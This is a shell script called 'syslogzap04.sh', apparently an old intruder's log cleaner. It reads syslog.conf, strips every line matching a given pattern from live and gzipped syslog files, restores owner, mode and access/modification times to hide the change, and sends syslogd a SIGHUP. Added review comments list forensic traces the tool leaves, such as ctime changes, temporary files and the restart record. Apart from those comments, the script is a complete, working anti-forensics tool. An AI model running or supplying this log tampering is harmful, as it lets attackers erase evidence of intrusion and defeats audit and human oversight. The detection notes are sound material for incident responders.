#!/bin/sh
#
# syslogzap04.sh
# Log cleaner for syslog files
# by xeon
#
# Uses a simple grep -v to drop every log line that matches the given string.
#
# Features:
# - automatically find syslogd log files
# - preserve log files uid/gid
# - preserve rwx bitmask
# - preserve access and mod time
# - also removes matching lines from zipped (.gz) logs
#
# Configuration file that is parsed further down to discover which files
# syslogd writes to.
SYSLOG_CONF="/etc/syslog.conf"
# Contents of every file matching /var/run/syslog*.pid; used at the end of the
# script as the target of a SIGHUP.
SYSLOG_PID=`cat /var/run/syslog*.pid`
  
# $1 is the pattern whose matching lines are removed from the logs. With no
# argument the script prints a hint and exits with status 0.
if [ $# == 0 ]; then
  echo "Give me a string to zap guy..."
  exit 0
fi


# Stop (again with status 0) when no PID was read; otherwise report it.
# NOTE(review): $SYSLOG_PID is unquoted, so an empty value leaves the test
# without a left operand; confirm which branch actually runs in that case.
if [ $SYSLOG_PID == "" ]; then
  echo "CANNOT FIND SYSLOGD PID!"
  exit 0
else
  echo "[+] Syslogd pid =" $SYSLOG_PID
fi


# Build the list of target files from the syslogd configuration.
# The pipeline splits the file on spaces, tabs and hyphens, de-duplicates the
# tokens and keeps every token that contains a "/". No further check is made
# that a token is really a log file path.
# Scope for an analyst: only paths named in $SYSLOG_CONF are selected. Tokens
# without a "/" are dropped, so records kept anywhere else are not in this list
# and remain available for comparison.
echo -n "[+] Parsing $SYSLOG_CONF..."

  # SYSLOG_FILES stays unset when the configuration file is not readable.
  if [ -r $SYSLOG_CONF ]; then
    SYSLOG_FILES=`cat $SYSLOG_CONF | tr -s " \t-" "\n" | sort | uniq | grep "/"`
  fi

echo "done"


# Main loop: for every path in $SYSLOG_FILES, rewrite the live log and then each
# of its compressed rotations without the lines that match $1.
#
# Observable side effects (useful when triaging a host where this has run):
# - two short-lived files appear next to each log: "<log>.gz.1" (a full copy)
#   and "<log>.touch" (an empty timestamp carrier);
# - the log is rewritten through a ">" redirect onto the existing path, so the
#   file keeps its owner and mode but its size changes (the script prints the
#   byte count before and after);
# - touch -am -r restores access and modification time only; the inode change
#   time is not something touch can set, so a ctime newer than the mtime on a
#   log file is worth checking;
# - copies of the same records held off-host or in backups are not modified by
#   anything in this loop and can be diffed against the local files.
echo "[+] Starting clean..."

  # cleaning current log
  for LOG in $SYSLOG_FILES; do
    echo -n " - Cleaning $LOG..."
    if [ -r $LOG ]; then
      
      # Print the size before the rewrite (second field of the wc output).
      echo -n "`wc -c $LOG | tr -s " " | cut -d" " -f2` -> "
      NEW_LOG="$LOG.gz.1"
      REF_LOG="$LOG.touch"
      # Create the reference file carrying the log's current atime/mtime.
      touch -am -r $LOG $REF_LOG
      
      # Work from a copy so the original path can be overwritten in place.
      cp -f $LOG $NEW_LOG
           
      if [ -f $NEW_LOG ]; then
        # $1 is passed to grep unquoted and is treated as a pattern, so every
        # line matching it is dropped, not only exact occurrences of a string.
        grep -v $1 $NEW_LOG > $LOG
	rm -f $NEW_LOG
        echo "`wc -c $LOG | tr -s " " | cut -d" " -f2`"
	# Copy the saved atime/mtime back onto the rewritten log, then drop the
	# reference file.
	touch -am -r $REF_LOG $LOG
	rm -f $REF_LOG
      else
        echo "   ERROR!!! Cannot create new log file"
      fi
    else
      echo "   ERROR!!! Cannot open $LOG"
    fi
  
    # cleaning also its old files
    # Every name matching "<log>*.gz*" is handled the same way as the live log,
    # except that the content is decompressed, filtered and recompressed.
    for ZIP_LOG in `ls $LOG*.gz* 2> /dev/null`; do
      echo -n " - Cleaning $ZIP_LOG..."
  
      echo -n "`wc -c $ZIP_LOG | tr -s " " | cut -d" " -f2` -> "
      NEW_LOG="$ZIP_LOG.gz.1"
      REF_LOG="$ZIP_LOG.touch"
      touch -am -r $ZIP_LOG $REF_LOG
  
      cp -f $ZIP_LOG $NEW_LOG
  
      if [ -f $NEW_LOG ]; then
        # The archive is regenerated by a fresh gzip run, so a stored hash or a
        # backup copy of the rotation will no longer match the file on disk.
        gzip -cd $NEW_LOG | grep -v $1 | gzip > $ZIP_LOG
        rm -f $NEW_LOG
        echo "`wc -c $ZIP_LOG | tr -s " " | cut -d" " -f2`"
        touch -am -r $REF_LOG $ZIP_LOG
        rm -f $REF_LOG
      else
        echo "   ERROR!!! Cannot create new log file"
      fi
    done
  done


# Send SIGHUP to the PID(s) read from /var/run/syslog*.pid at the top of the
# script. The message calls this a restart; the only action taken here is the
# signal itself.
# NOTE(review): many syslogd implementations write a restart/reload record when
# they receive SIGHUP; confirm for the daemon in use, since an unscheduled
# record of that kind is a useful correlation point.
echo -n "[+] Restarting syslogd..."

  kill -HUP $SYSLOG_PID

echo "done"	
